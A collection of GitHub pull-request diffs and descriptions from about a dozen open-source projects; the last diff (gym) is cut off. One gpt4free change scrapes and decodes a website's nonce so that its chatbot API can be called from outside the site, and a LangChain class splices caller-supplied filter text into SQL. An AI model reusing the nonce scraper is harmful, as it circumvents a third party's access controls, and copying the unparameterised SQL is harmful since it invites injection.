@@ -200,6 +200,8 @@ You can add variable sections to a URL by marking sections with
as a keyword argument. Optionally, you can use a converter to specify the type
of the argument like ``<converter:variable_name>``. ::
+ from markupsafe import escape
+
@app.route('/user/<username>')
def show_user_profile(username):
# show the user profile for that user
@@ -281,7 +283,8 @@ Python shell. See :ref:`context-locals`.
.. code-block:: python
- from flask import Flask, escape, url_for
+ from flask import Flask, url_for
+ from markupsafe import escape
app = Flask(__name__)
@@ -419,9 +422,9 @@ markup to HTML) you can mark it as safe by using the
:class:`~jinja2.Markup` class or by using the ``|safe`` filter in the
template. Head over to the Jinja 2 documentation for more examples.
-Here is a basic introduction to how the :class:`~jinja2.Markup` class works::
+Here is a basic introduction to how the :class:`~markupsafe.Markup` class works::
- >>> from flask import Markup
+ >>> from markupsafe import Markup
>>> Markup('<strong>Hello %s!</strong>') % '<blink>hacker</blink>'
Markup(u'<strong>Hello <blink>hacker</blink>!</strong>')
>>> Markup.escape('<blink>hacker</blink>')
@@ -768,7 +771,8 @@ unless they know the secret key used for signing.
In order to use sessions you have to set a secret key. Here is how
sessions work::
- from flask import Flask, session, redirect, url_for, escape, request
+ from flask import Flask, session, redirect, url_for, request
+ from markupsafe import escape
app = Flask(__name__)
| `flask.escape` used in [Variable Rule](https://flask.palletsprojects.com/en/1.1.x/quickstart/#variable-rules) section but doesn't import, this PR will add the missing import statement.
Fix #3471 | https://api.github.com/repos/pallets/flask/pulls/3473 | 2020-01-22T15:15:59Z | 2020-02-11T02:12:50Z | 2020-02-11T02:12:50Z | 2020-11-14T01:42:42Z | 487 | pallets/flask | 20,708 |
bugfix: docker image metagpt/metagpt:v0.1 -> metagpt/metagpt:v0.2 | diff --git a/README.md b/README.md
index d2057a4bb..8ade2339b 100644
--- a/README.md
+++ b/README.md
@@ -54,9 +54,9 @@ python setup.py install
### Installation by Docker
```bash
# Step 1: Download metagpt official image and prepare config.yaml
-docker pull metagpt/metagpt:v0.1
+docker pull metagpt/metagpt:v0.2
mkdir -p /opt/metagpt/{config,workspace} && chmod 777 -R /opt/metagpt
-docker run --rm metagpt/metagpt:v0.1 cat /app/metagpt/config/config.yaml > /opt/metagpt/config/config.yaml
+docker run --rm metagpt/metagpt:v0.2 cat /app/metagpt/config/config.yaml > /opt/metagpt/config/config.yaml
vim /opt/metagpt/config/config.yaml # Change the config
# Step 2: Run metagpt demo with container
| https://api.github.com/repos/geekan/MetaGPT/pulls/44 | 2023-07-13T08:36:37Z | 2023-07-13T08:49:39Z | 2023-07-13T08:49:39Z | 2023-07-13T08:49:40Z | 229 | geekan/MetaGPT | 16,532 |
|
added extractor for dctp.tv | diff --git a/youtube_dl/downloader/rtmp.py b/youtube_dl/downloader/rtmp.py
index e06ebe8266f..f7eeb6f43f0 100644
--- a/youtube_dl/downloader/rtmp.py
+++ b/youtube_dl/downloader/rtmp.py
@@ -104,6 +104,7 @@ def run_rtmpdump(args):
live = info_dict.get('rtmp_live', False)
conn = info_dict.get('rtmp_conn', None)
protocol = info_dict.get('rtmp_protocol', None)
+ real_time = info_dict.get('rtmp_real_time', False)
no_resume = info_dict.get('no_resume', False)
continue_dl = info_dict.get('continuedl', False)
@@ -143,6 +144,8 @@ def run_rtmpdump(args):
basic_args += ['--conn', conn]
if protocol is not None:
basic_args += ['--protocol', protocol]
+ if real_time:
+ basic_args += ['--realtime']
args = basic_args
if not no_resume and continue_dl and not live:
diff --git a/youtube_dl/extractor/__init__.py b/youtube_dl/extractor/__init__.py
index 03c56156a97..873ae69d3c2 100644
--- a/youtube_dl/extractor/__init__.py
+++ b/youtube_dl/extractor/__init__.py
@@ -89,6 +89,7 @@
)
from .daum import DaumIE
from .dbtv import DBTVIE
+from .dctp import DctpTvIE
from .deezer import DeezerPlaylistIE
from .dfb import DFBIE
from .dotsub import DotsubIE
diff --git a/youtube_dl/extractor/dctp.py b/youtube_dl/extractor/dctp.py
new file mode 100644
index 00000000000..8a77f2b662e
--- /dev/null
+++ b/youtube_dl/extractor/dctp.py
@@ -0,0 +1,50 @@
+# encoding: utf-8
+from __future__ import unicode_literals
+
+from .common import InfoExtractor
+
+
+class DctpTvIE(InfoExtractor):
+ _VALID_URL = r'^http://www.dctp.tv/(#/)?filme/(?P<id>.+?)/$'
+ _TEST = {
+ 'url': 'http://www.dctp.tv/filme/videoinstallation-fuer-eine-kaufhausfassade/',
+ 'info_dict': {
+ 'id': '1324',
+ 'display_id': 'videoinstallation-fuer-eine-kaufhausfassade',
+ 'ext': 'flv',
+ 'title': 'Videoinstallation für eine Kaufhausfassade'}
+ }
+
+ def _real_extract(self, url):
+ video_id = self._match_id(url)
+ base_url = 'http://dctp-ivms2-restapi.s3.amazonaws.com/'
+ version_json = self._download_json(base_url + 'version.json', video_id)
+ version = version_json['version_name']
+ info_json = self._download_json(
+ '{0}{1}/restapi/slugs/{2}.json'.format(base_url, version, video_id), video_id)
+ object_id = str(info_json['object_id'])
+ meta_json = self._download_json(
+ '{0}{1}/restapi/media/{2}.json'.format(base_url, version, object_id), video_id)
+ uuid = meta_json['uuid']
+ title = meta_json['title']
+ wide = meta_json['is_wide']
+ if wide:
+ ratio = '16x9'
+ else:
+ ratio = '4x3'
+ play_path = 'mp4:{0}_dctp_0500_{1}.m4v'.format(uuid, ratio)
+
+ servers_json = self._download_json('http://www.dctp.tv/streaming_servers/', video_id)
+ url = servers_json[0]['endpoint']
+
+ return {
+ 'id': object_id,
+ 'title': title,
+ 'format': 'rtmp',
+ 'url': url,
+ 'play_path': play_path,
+ 'rtmp_real_time': True,
+ 'ext': 'flv',
+ 'display_id': video_id
+ }
+
| Needs --realtime flag for rtmpdump, otherwise the downloaded video is broken.
The fetched json file has more meta data. Not sure what it is used for, other than bookkeeping, so I leave this as a TODO.
| https://api.github.com/repos/ytdl-org/youtube-dl/pulls/4796 | 2015-01-28T08:07:15Z | 2015-01-30T02:16:42Z | 2015-01-30T02:16:42Z | 2015-01-30T02:16:57Z | 982 | ytdl-org/youtube-dl | 50,478 |
Add airoboros_v3 chat template (llama-2 format) | diff --git a/fastchat/conversation.py b/fastchat/conversation.py
index d782b55e7e..f36cbfe903 100644
--- a/fastchat/conversation.py
+++ b/fastchat/conversation.py
@@ -392,6 +392,18 @@ def get_conv_template(name: str) -> Conversation:
)
)
+register_conv_template(
+ Conversation(
+ name="airoboros_v3",
+ system_template="[INST] <<SYS>>\n{system_message}\n<</SYS>>\n\n",
+ system_message="You are a helpful, unbiased, uncensored assistant.",
+ roles=("[INST]", "[/INST]"),
+ sep_style=SeparatorStyle.LLAMA2,
+ sep=" ",
+ sep2=" </s><s>",
+ )
+)
+
# Koala default template
register_conv_template(
Conversation(
diff --git a/fastchat/model/model_adapter.py b/fastchat/model/model_adapter.py
index f33d5232d7..832fe93c15 100644
--- a/fastchat/model/model_adapter.py
+++ b/fastchat/model/model_adapter.py
@@ -611,6 +611,8 @@ def match(self, model_path: str):
return False
def get_default_conv_template(self, model_path: str) -> Conversation:
+ if "-3." in model_path or "-3p" in model_path:
+ return get_conv_template("airoboros_v3")
if "spicyboros" in model_path or re.search(r"-(2\.[2-9]+)", model_path):
return get_conv_template("airoboros_v2")
return get_conv_template("airoboros_v1")
| ## Why are these changes needed?
Add support for llama-2-based prompt format used by the airoboros-3.x models.
## Checks
- [x] I've run `format.sh` to lint the changes in this PR.
| https://api.github.com/repos/lm-sys/FastChat/pulls/2564 | 2023-10-15T09:48:05Z | 2023-10-15T19:27:15Z | 2023-10-15T19:27:15Z | 2023-10-15T19:27:15Z | 370 | lm-sys/FastChat | 41,717 |
Add MyScaleWithoutJSON which allows user to wrap columns into Document's Metadata | diff --git a/libs/langchain/langchain/vectorstores/myscale.py b/libs/langchain/langchain/vectorstores/myscale.py
index 609c496e1480b6..9dbc6ae40a9a26 100644
--- a/libs/langchain/langchain/vectorstores/myscale.py
+++ b/libs/langchain/langchain/vectorstores/myscale.py
@@ -490,3 +490,125 @@ def delete(
@property
def metadata_column(self) -> str:
return self.config.column_map["metadata"]
+
+
+class MyScaleWithoutJSON(MyScale):
+ """MyScale vector store without metadata column
+
+ This is super handy if you are working to a SQL-native table
+ """
+
+ def __init__(
+ self,
+ embedding: Embeddings,
+ config: Optional[MyScaleSettings] = None,
+ must_have_cols: List[str] = [],
+ **kwargs: Any,
+ ) -> None:
+ """Building a myscale vector store without metadata column
+
+ embedding (Embeddings): embedding model
+ config (MyScaleSettings): Configuration to MyScale Client
+ must_have_cols (List[str]): column names to be included in query
+ Other keyword arguments will pass into
+ [clickhouse-connect](https://docs.myscale.com/)
+ """
+ super().__init__(embedding, config, **kwargs)
+ self.must_have_cols: List[str] = must_have_cols
+
+ def _build_qstr(
+ self, q_emb: List[float], topk: int, where_str: Optional[str] = None
+ ) -> str:
+ q_emb_str = ",".join(map(str, q_emb))
+ if where_str:
+ where_str = f"PREWHERE {where_str}"
+ else:
+ where_str = ""
+
+ q_str = f"""
+ SELECT {self.config.column_map['text']}, dist,
+ {','.join(self.must_have_cols)}
+ FROM {self.config.database}.{self.config.table}
+ {where_str}
+ ORDER BY distance({self.config.column_map['vector']}, [{q_emb_str}])
+ AS dist {self.dist_order}
+ LIMIT {topk}
+ """
+ return q_str
+
+ def similarity_search_by_vector(
+ self,
+ embedding: List[float],
+ k: int = 4,
+ where_str: Optional[str] = None,
+ **kwargs: Any,
+ ) -> List[Document]:
+ """Perform a similarity search with MyScale by vectors
+
+ Args:
+ query (str): query string
+ k (int, optional): Top K neighbors to retrieve. Defaults to 4.
+ where_str (Optional[str], optional): where condition string.
+ Defaults to None.
+
+ NOTE: Please do not let end-user to fill this and always be aware
+ of SQL injection. When dealing with metadatas, remember to
+ use `{self.metadata_column}.attribute` instead of `attribute`
+ alone. The default name for it is `metadata`.
+
+ Returns:
+ List[Document]: List of (Document, similarity)
+ """
+ q_str = self._build_qstr(embedding, k, where_str)
+ try:
+ return [
+ Document(
+ page_content=r[self.config.column_map["text"]],
+ metadata={k: r[k] for k in self.must_have_cols},
+ )
+ for r in self.client.query(q_str).named_results()
+ ]
+ except Exception as e:
+ logger.error(f"\033[91m\033[1m{type(e)}\033[0m \033[95m{str(e)}\033[0m")
+ return []
+
+ def similarity_search_with_relevance_scores(
+ self, query: str, k: int = 4, where_str: Optional[str] = None, **kwargs: Any
+ ) -> List[Tuple[Document, float]]:
+ """Perform a similarity search with MyScale
+
+ Args:
+ query (str): query string
+ k (int, optional): Top K neighbors to retrieve. Defaults to 4.
+ where_str (Optional[str], optional): where condition string.
+ Defaults to None.
+
+ NOTE: Please do not let end-user to fill this and always be aware
+ of SQL injection. When dealing with metadatas, remember to
+ use `{self.metadata_column}.attribute` instead of `attribute`
+ alone. The default name for it is `metadata`.
+
+ Returns:
+ List[Document]: List of documents most similar to the query text
+ and cosine distance in float for each.
+ Lower score represents more similarity.
+ """
+ q_str = self._build_qstr(self._embeddings.embed_query(query), k, where_str)
+ try:
+ return [
+ (
+ Document(
+ page_content=r[self.config.column_map["text"]],
+ metadata={k: r[k] for k in self.must_have_cols},
+ ),
+ r["dist"],
+ )
+ for r in self.client.query(q_str).named_results()
+ ]
+ except Exception as e:
+ logger.error(f"\033[91m\033[1m{type(e)}\033[0m \033[95m{str(e)}\033[0m")
+ return []
+
+ @property
+ def metadata_column(self) -> str:
+ return ""
| <!-- Thank you for contributing to LangChain!
Replace this entire comment with:
- **Description:** a description of the change,
- **Issue:** the issue # it fixes (if applicable),
- **Dependencies:** any dependencies required for this change,
- **Tag maintainer:** for a quicker response, tag the relevant maintainer (see below),
- **Twitter handle:** we announce bigger features on Twitter. If your PR gets announced, and you'd like a mention, we'll gladly shout you out!
Please make sure your PR is passing linting and testing before submitting. Run `make format`, `make lint` and `make test` to check this locally.
See contribution guidelines for more information on how to write/run tests, lint, etc:
https://github.com/langchain-ai/langchain/blob/master/.github/CONTRIBUTING.md
If you're adding a new integration, please include:
1. a test for the integration, preferably unit tests that do not rely on network access,
2. an example notebook showing its use. It lives in `docs/extras` directory.
If no one reviews your PR within a few days, please @-mention one of @baskaryan, @eyurtsev, @hwchase17.
-->
Replace this entire comment with:
- **Description:** Add MyScaleWithoutJSON which allows user to wrap columns into Document's Metadata
- **Tag maintainer:** @baskaryan | https://api.github.com/repos/langchain-ai/langchain/pulls/13164 | 2023-11-10T03:51:25Z | 2023-11-13T18:10:36Z | 2023-11-13T18:10:36Z | 2023-11-16T09:32:43Z | 1,219 | langchain-ai/langchain | 43,382 |
[jobs] Fix `test_backwards_compatibility.py` by pinning `pydantic<2` | diff --git a/dashboard/modules/job/tests/backwards_compatibility_scripts/test_backwards_compatibility.sh b/dashboard/modules/job/tests/backwards_compatibility_scripts/test_backwards_compatibility.sh
index 4ec95a112e904..8ae0da8688d31 100755
--- a/dashboard/modules/job/tests/backwards_compatibility_scripts/test_backwards_compatibility.sh
+++ b/dashboard/modules/job/tests/backwards_compatibility_scripts/test_backwards_compatibility.sh
@@ -34,8 +34,8 @@ do
conda create -y -n "${env_name}" python="${PYTHON_VERSION}"
conda activate "${env_name}"
- pip install -U ray=="${RAY_VERSION}"
- pip install -U ray[default]=="${RAY_VERSION}"
+ # Pin pydantic version due to: https://github.com/ray-project/ray/issues/36990.
+ pip install -U "pydantic<2" ray=="${RAY_VERSION}" ray[default]=="${RAY_VERSION}"
printf "\n\n\n"
echo "========================================================="
| <!-- Thank you for your contribution! Please review https://github.com/ray-project/ray/blob/master/CONTRIBUTING.rst before opening a pull request. -->
<!-- Please add a reviewer to the assignee section when you create a PR. If you don't have the access to it, we will shortly find a reviewer and assign them to your PR. -->
## Why are these changes needed?
This appears to be the same issue as https://github.com/ray-project/ray/issues/36990
Pinning the version in the install in `test_backwards_compatibility.sh`
## Related issue number
<!-- For example: "Closes #1234" -->
## Checks
- [ ] I've signed off every commit(by using the -s flag, i.e., `git commit -s`) in this PR.
- [ ] I've run `scripts/format.sh` to lint the changes in this PR.
- [ ] I've included any doc changes needed for https://docs.ray.io/en/master/.
- [ ] I've added any new APIs to the API Reference. For example, if I added a
method in Tune, I've added it in `doc/source/tune/api/` under the
corresponding `.rst` file.
- [ ] I've made sure the tests are passing. Note that there might be a few flaky tests, see the recent failures at https://flakey-tests.ray.io/
- Testing Strategy
- [ ] Unit tests
- [ ] Release tests
- [ ] This PR is not tested :(
| https://api.github.com/repos/ray-project/ray/pulls/37097 | 2023-07-05T14:15:44Z | 2023-07-05T16:49:00Z | 2023-07-05T16:49:00Z | 2023-07-05T16:49:01Z | 225 | ray-project/ray | 19,223 |
Update README.md | diff --git a/README.md b/README.md
index 5c7fa3949..0cb86c750 100644
--- a/README.md
+++ b/README.md
@@ -29,6 +29,10 @@ CentOS:
yum install python-setuptools && easy_install pip
pip install shadowsocks
+Linux distributions with [snap](http://snapcraft.io/):
+
+ snap install shadowsocks
+
Windows:
See [Install Shadowsocks Server on Windows](https://github.com/shadowsocks/shadowsocks/wiki/Install-Shadowsocks-Server-on-Windows).
@@ -52,6 +56,11 @@ To check the log:
Check all the options via `-h`. You can also use a [Configuration] file
instead.
+If you installed the [snap](http://snapcraft.io/) package, you have to prefix the commands with `shadowsocks.`,
+like this:
+
+ shadowsocks.ssserver -p 443 -k password -m aes-256-cfb
+
### Usage with Config File
[Create configeration file and run](https://github.com/shadowsocks/shadowsocks/wiki/Configuration-via-Config-File)
| Add installation and usage instructions for snap package. | https://api.github.com/repos/shadowsocks/shadowsocks/pulls/734 | 2017-01-19T18:40:08Z | 2017-09-06T07:13:27Z | 2017-09-06T07:13:27Z | 2017-09-06T07:13:27Z | 265 | shadowsocks/shadowsocks | 24,640 |
fix problem with path being double escaped | diff --git a/requests/models.py b/requests/models.py
index 82c7572995..c2cbe97918 100644
--- a/requests/models.py
+++ b/requests/models.py
@@ -351,8 +351,8 @@ def path_url(self):
if not path:
path = '/'
- # if is_py3:
- path = quote(path.encode('utf-8'))
+ if is_py3:
+ path = quote(path.encode('utf-8'))
url.append(path)
diff --git a/test_requests.py b/test_requests.py
index 034f469c5b..c3f3deb646 100644
--- a/test_requests.py
+++ b/test_requests.py
@@ -72,6 +72,12 @@ def test_entry_points(self):
def test_invalid_url(self):
self.assertRaises(ValueError, get, 'hiwpefhipowhefopw')
+
+ def test_path_is_not_double_encoded(self):
+ request = requests.Request("http://0.0.0.0/get/~test")
+
+ assert request.path_url == "/get/%7Etest"
+
def test_HTTP_200_OK_GET(self):
r = get(httpbin('/get'))
self.assertEqual(r.status_code, 200)
| On python 2.6.4 (at least) the path portion is getting escaped twice -> once in Request.full_url and once in Request.path_url
This fixes it, but I don't know why there was a commented test for Python 3.
| https://api.github.com/repos/psf/requests/pulls/387 | 2012-01-25T16:24:25Z | 2012-01-25T16:25:26Z | 2012-01-25T16:25:26Z | 2021-09-09T00:01:25Z | 281 | psf/requests | 32,448 |
Fix parser bug where "type" was misinterpreted as a keyword inside a match | diff --git a/CHANGES.md b/CHANGES.md
index 610a9de0e4..f89b1b9df0 100644
--- a/CHANGES.md
+++ b/CHANGES.md
@@ -37,6 +37,8 @@
<!-- Changes to the parser or to version autodetection -->
+- Fix bug where attributes named `type` were not acccepted inside `match` statements
+ (#3950)
- Add support for PEP 695 type aliases containing lambdas and other unusual expressions
(#3949)
diff --git a/src/blib2to3/pgen2/parse.py b/src/blib2to3/pgen2/parse.py
index 299cc24a15..ad51a3dad0 100644
--- a/src/blib2to3/pgen2/parse.py
+++ b/src/blib2to3/pgen2/parse.py
@@ -211,6 +211,7 @@ def __init__(self, grammar: Grammar, convert: Optional[Convert] = None) -> None:
# See note in docstring above. TL;DR this is ignored.
self.convert = convert or lam_sub
self.is_backtracking = False
+ self.last_token: Optional[int] = None
def setup(self, proxy: "TokenProxy", start: Optional[int] = None) -> None:
"""Prepare for parsing.
@@ -236,6 +237,7 @@ def setup(self, proxy: "TokenProxy", start: Optional[int] = None) -> None:
self.rootnode: Optional[NL] = None
self.used_names: Set[str] = set()
self.proxy = proxy
+ self.last_token = None
def addtoken(self, type: int, value: str, context: Context) -> bool:
"""Add a token; return True iff this is the end of the program."""
@@ -317,6 +319,7 @@ def _addtoken(self, ilabel: int, type: int, value: str, context: Context) -> boo
dfa, state, node = self.stack[-1]
states, first = dfa
# Done with this token
+ self.last_token = type
return False
else:
@@ -343,9 +346,23 @@ def classify(self, type: int, value: str, context: Context) -> List[int]:
return [self.grammar.keywords[value]]
elif value in self.grammar.soft_keywords:
assert type in self.grammar.tokens
+ # Current soft keywords (match, case, type) can only appear at the
+ # beginning of a statement. So as a shortcut, don't try to treat them
+ # like keywords in any other context.
+ # ('_' is also a soft keyword in the real grammar, but for our grammar
+ # it's just an expression, so we don't need to treat it specially.)
+ if self.last_token not in (
+ None,
+ token.INDENT,
+ token.DEDENT,
+ token.NEWLINE,
+ token.SEMI,
+ token.COLON,
+ ):
+ return [self.grammar.tokens[type]]
return [
- self.grammar.soft_keywords[value],
self.grammar.tokens[type],
+ self.grammar.soft_keywords[value],
]
ilabel = self.grammar.tokens.get(type)
diff --git a/tests/data/cases/pattern_matching_complex.py b/tests/data/cases/pattern_matching_complex.py
index b4355c7333..10b4d26e28 100644
--- a/tests/data/cases/pattern_matching_complex.py
+++ b/tests/data/cases/pattern_matching_complex.py
@@ -143,3 +143,7 @@
y = 1
case []:
y = 2
+# issue 3790
+match (X.type, Y):
+ case _:
+ pass
diff --git a/tests/data/cases/type_aliases.py b/tests/data/cases/type_aliases.py
index 9631bfd5cc..7c2009e820 100644
--- a/tests/data/cases/type_aliases.py
+++ b/tests/data/cases/type_aliases.py
@@ -5,6 +5,8 @@
type Alias[T]=lambda: T
type And[T]=T and T
type IfElse[T]=T if T else T
+type One = int; type Another = str
+class X: type InClass = int
type = aliased
print(type(42))
@@ -16,6 +18,13 @@
type Alias[T] = lambda: T
type And[T] = T and T
type IfElse[T] = T if T else T
+type One = int
+type Another = str
+
+
+class X:
+ type InClass = int
+
type = aliased
print(type(42))
| Fixes #3790
Slightly hacky, but I think this is correct and it should also improve performance somewhat.
| https://api.github.com/repos/psf/black/pulls/3950 | 2023-10-16T14:07:05Z | 2023-10-17T07:59:16Z | 2023-10-17T07:59:16Z | 2023-10-17T07:59:16Z | 1,059 | psf/black | 24,167 |
Add Hindi language to config | diff --git a/website/next-i18next.config.js b/website/next-i18next.config.js
index 953720ccd9..26f007b2d0 100644
--- a/website/next-i18next.config.js
+++ b/website/next-i18next.config.js
@@ -19,6 +19,7 @@ module.exports = {
"fr",
"gl",
"he",
+ "hi",
"hu",
"id",
"it",
| This language was added as a translation but never added to the config file so it did not actually activate on the website. | https://api.github.com/repos/LAION-AI/Open-Assistant/pulls/2881 | 2023-04-24T16:26:56Z | 2023-04-24T16:54:04Z | 2023-04-24T16:54:04Z | 2023-04-25T12:42:34Z | 110 | LAION-AI/Open-Assistant | 37,556 |
Fix permissions error when upgrading certbot-auto 0.18.x | diff --git a/letsencrypt-auto-source/letsencrypt-auto b/letsencrypt-auto-source/letsencrypt-auto
index 223fbfd321f..254f02c0acf 100755
--- a/letsencrypt-auto-source/letsencrypt-auto
+++ b/letsencrypt-auto-source/letsencrypt-auto
@@ -187,8 +187,7 @@ SetRootAuthMechanism() {
if [ "$1" = "--cb-auto-has-root" ]; then
shift 1
-elif [ "$1" != "--le-auto-phase2" ]; then
- # if $1 is --le-auto-phase2, we've executed this branch before
+else
SetRootAuthMechanism
if [ -n "$SUDO" ]; then
echo "Requesting to rerun $0 with root privileges..."
@@ -197,6 +196,14 @@ elif [ "$1" != "--le-auto-phase2" ]; then
fi
fi
+# Runs this script again with the given arguments. --cb-auto-has-root is added
+# to the command line arguments to ensure we don't try to acquire root a
+# second time. After the script is rerun, we exit the current script.
+RerunWithArgs() {
+ "$0" --cb-auto-has-root "$@"
+ exit 0
+}
+
BootstrapMessage() {
# Arguments: Platform name
say "Bootstrapping dependencies for $1... (you can skip this with --no-bootstrap)"
@@ -825,8 +832,7 @@ if [ "$1" = "--le-auto-phase2" ]; then
# if non-interactive mode or stdin and stdout are connected to a terminal
if [ \( "$NONINTERACTIVE" = 1 \) -o \( \( -t 0 \) -a \( -t 1 \) \) ]; then
rm -rf "$VENV_PATH"
- "$0" "$@"
- exit 0
+ RerunWithArgs "$@"
else
error "Skipping upgrade because new OS dependencies may need to be installed."
error
@@ -1491,5 +1497,5 @@ UNLIKELY_EOF
fi # A newer version is available.
fi # Self-upgrading is allowed.
- "$0" --le-auto-phase2 "$@"
+ RerunWithArgs --le-auto-phase2 "$@"
fi
diff --git a/letsencrypt-auto-source/letsencrypt-auto.template b/letsencrypt-auto-source/letsencrypt-auto.template
index eb2b827768a..4eef10c804a 100755
--- a/letsencrypt-auto-source/letsencrypt-auto.template
+++ b/letsencrypt-auto-source/letsencrypt-auto.template
@@ -187,8 +187,7 @@ SetRootAuthMechanism() {
if [ "$1" = "--cb-auto-has-root" ]; then
shift 1
-elif [ "$1" != "--le-auto-phase2" ]; then
- # if $1 is --le-auto-phase2, we've executed this branch before
+else
SetRootAuthMechanism
if [ -n "$SUDO" ]; then
echo "Requesting to rerun $0 with root privileges..."
@@ -197,6 +196,14 @@ elif [ "$1" != "--le-auto-phase2" ]; then
fi
fi
+# Runs this script again with the given arguments. --cb-auto-has-root is added
+# to the command line arguments to ensure we don't try to acquire root a
+# second time. After the script is rerun, we exit the current script.
+RerunWithArgs() {
+ "$0" --cb-auto-has-root "$@"
+ exit 0
+}
+
BootstrapMessage() {
# Arguments: Platform name
say "Bootstrapping dependencies for $1... (you can skip this with --no-bootstrap)"
@@ -406,8 +413,7 @@ if [ "$1" = "--le-auto-phase2" ]; then
# if non-interactive mode or stdin and stdout are connected to a terminal
if [ \( "$NONINTERACTIVE" = 1 \) -o \( \( -t 0 \) -a \( -t 1 \) \) ]; then
rm -rf "$VENV_PATH"
- "$0" "$@"
- exit 0
+ RerunWithArgs "$@"
else
error "Skipping upgrade because new OS dependencies may need to be installed."
error
@@ -567,5 +573,5 @@ UNLIKELY_EOF
fi # A newer version is available.
fi # Self-upgrading is allowed.
- "$0" --le-auto-phase2 "$@"
+ RerunWithArgs --le-auto-phase2 "$@"
fi
| Cherry picked from #5086 and commit 82d0ff1df249cdd6748b95aab73ec4aa19b24cb6. | https://api.github.com/repos/certbot/certbot/pulls/5089 | 2017-09-08T00:26:37Z | 2017-09-08T02:40:42Z | 2017-09-08T02:40:42Z | 2017-09-08T02:40:45Z | 1,036 | certbot/certbot | 1,858 |
Automatically obtain restNonce | diff --git a/gpt4free/hpgptai/__init__.py b/gpt4free/hpgptai/__init__.py
index c8772a19f5..f5d1f0edc3 100644
--- a/gpt4free/hpgptai/__init__.py
+++ b/gpt4free/hpgptai/__init__.py
@@ -5,20 +5,26 @@
@File :__init__.py.py
@IDE :PyCharm
"""
+import re
import json
-import requests
+import base64
import random
import string
+import requests
+from fake_useragent import UserAgent
+
class ChatCompletion:
@staticmethod
def create(
messages: list,
- context: str="Converse as if you were an AI assistant. Be friendly, creative.",
- restNonce:str="9d6d743bd3",
- proxy:str=None
+ context: str = "Converse as if you were an AI assistant. Be friendly, creative.",
+ restNonce: str = None,
+ proxy: str = None
):
url = "https://chatgptlogin.ac/wp-json/ai-chatbot/v1/chat"
+ if not restNonce:
+ restNonce = ChatCompletion.get_restNonce(proxy)
headers = {
"Content-Type": "application/json",
"X-Wp-Nonce": restNonce
@@ -27,7 +33,7 @@ def create(
data = {
"env": "chatbot",
"session": "N/A",
- "prompt": ChatCompletion.__build_prompt(context,messages),
+ "prompt": ChatCompletion.__build_prompt(context, messages),
"context": context,
"messages": messages,
"newMessage": messages[-1]["content"],
@@ -48,7 +54,6 @@ def create(
return res.json()
return res.text
-
@staticmethod
def randomStr():
return ''.join(random.choices(string.ascii_lowercase + string.digits, k=34))[:11]
@@ -66,12 +71,26 @@ def __build_prompt(cls, context: str, message: list, isCasuallyFineTuned=False,
prompt += '\n' + "AI: "
return prompt
-
+ @classmethod
+ def get_restNonce(cls, proxy: str = None):
+ url = "https://chatgptlogin.ac/"
+ headers = {
+ "Referer": "https://chatgptlogin.ac/",
+ "User-Agent": UserAgent().random
+ }
+ proxies = {'http': 'http://' + proxy, 'https': 'http://' + proxy} if proxy else None
+ res = requests.get(url, headers=headers, proxies=proxies)
+ src = re.search(
+ 'class="mwai-chat mwai-chatgpt">.*<span>Send</span></button></div></div></div> <script defer src="(.*?)">',
+ res.text).group(1)
+ decoded_string = base64.b64decode(src.split(",")[-1]).decode('utf-8')
+ restNonce = re.search(r"let restNonce = '(.*?)';", decoded_string).group(1)
+ return restNonce
class Completion:
@staticmethod
- def create(prompt: str,proxy:str):
+ def create(prompt: str, proxy: str):
messages = [
{
"content": prompt,
@@ -81,4 +100,4 @@ def create(prompt: str,proxy:str):
"who": "User: ",
},
]
- return ChatCompletion.create(messages=messages,proxy=proxy)
\ No newline at end of file
+ return ChatCompletion.create(messages=messages, proxy=proxy)
\ No newline at end of file
| RestNonce automatically changes every day and requires requesting the webpage to obtain the restNonce value | https://api.github.com/repos/xtekky/gpt4free/pulls/601 | 2023-05-25T02:46:18Z | 2023-05-26T14:54:51Z | 2023-05-26T14:54:51Z | 2023-05-26T14:54:51Z | 828 | xtekky/gpt4free | 38,199 |
vector env updates | diff --git a/gym/vector/async_vector_env.py b/gym/vector/async_vector_env.py
index 38c72eb2701..d1d4a0809a2 100644
--- a/gym/vector/async_vector_env.py
+++ b/gym/vector/async_vector_env.py
@@ -51,9 +51,23 @@ class AsyncVectorEnv(VectorEnv):
context : str, optional
Context for multiprocessing. If `None`, then the default context is used.
Only available in Python 3.
+
+ daemon : bool (default: `True`)
+ If `True`, then subprocesses have `daemon` flag turned on; that is, they
+ will quit if the head process quits. However, `daemon=True` prevents
+ subprocesses to spawn children, so for some environments you may want
+ to have it set to `False`
+
+ worker : function, optional
+ WARNING - advanced mode option! If set, then use that worker in a subprocess
+ instead of a default one. Can be useful to override some inner vector env
+ logic, for instance, how resets on done are handled. Provides high
+ degree of flexibility and a high chance to shoot yourself in the foot; thus,
+ if you are writing your own worker, it is recommended to start from the code
+ for `_worker` (or `_worker_shared_memory`) method below, and add changes
"""
def __init__(self, env_fns, observation_space=None, action_space=None,
- shared_memory=True, copy=True, context=None):
+ shared_memory=True, copy=True, context=None, daemon=True, worker=None):
try:
ctx = mp.get_context(context)
except AttributeError:
@@ -86,6 +100,7 @@ def __init__(self, env_fns, observation_space=None, action_space=None,
self.parent_pipes, self.processes = [], []
self.error_queue = ctx.Queue()
target = _worker_shared_memory if self.shared_memory else _worker
+ target = worker or target
with clear_mpi_env_vars():
for idx, env_fn in enumerate(self.env_fns):
parent_pipe, child_pipe = ctx.Pipe()
@@ -97,7 +112,7 @@ def __init__(self, env_fns, observation_space=None, action_space=None,
self.parent_pipes.append(parent_pipe)
self.processes.append(process)
- process.daemon = True
+ process.daemon = daemon
process.start()
child_pipe.close()
@@ -105,16 +120,6 @@ def __init__(self, env_fns, observation_space=None, action_space=None,
self._check_observation_spaces()
def seed(self, seeds=None):
- """
- Parameters
- ----------
- seeds : list of int, or int, optional
- Random seed for each individual environment. If `seeds` is a list of
- length `num_envs`, then the items of the list are chosen as random
- seeds. If `seeds` is an int, then each environment uses the random
- seed `seeds + n`, where `n` is the index of the environment (between
- `0` and `num_envs - 1`).
- """
self._assert_is_running()
if seeds is None:
seeds = [None for _ in range(self.num_envs)]
diff --git a/gym/vector/sync_vector_env.py b/gym/vector/sync_vector_env.py
index 4a8b1cfbcfa..379977ae9e7 100644
--- a/gym/vector/sync_vector_env.py
+++ b/gym/vector/sync_vector_env.py
@@ -45,18 +45,9 @@ def __init__(self, env_fns, observation_space=None, action_space=None,
n=self.num_envs, fn=np.zeros)
self._rewards = np.zeros((self.num_envs,), dtype=np.float64)
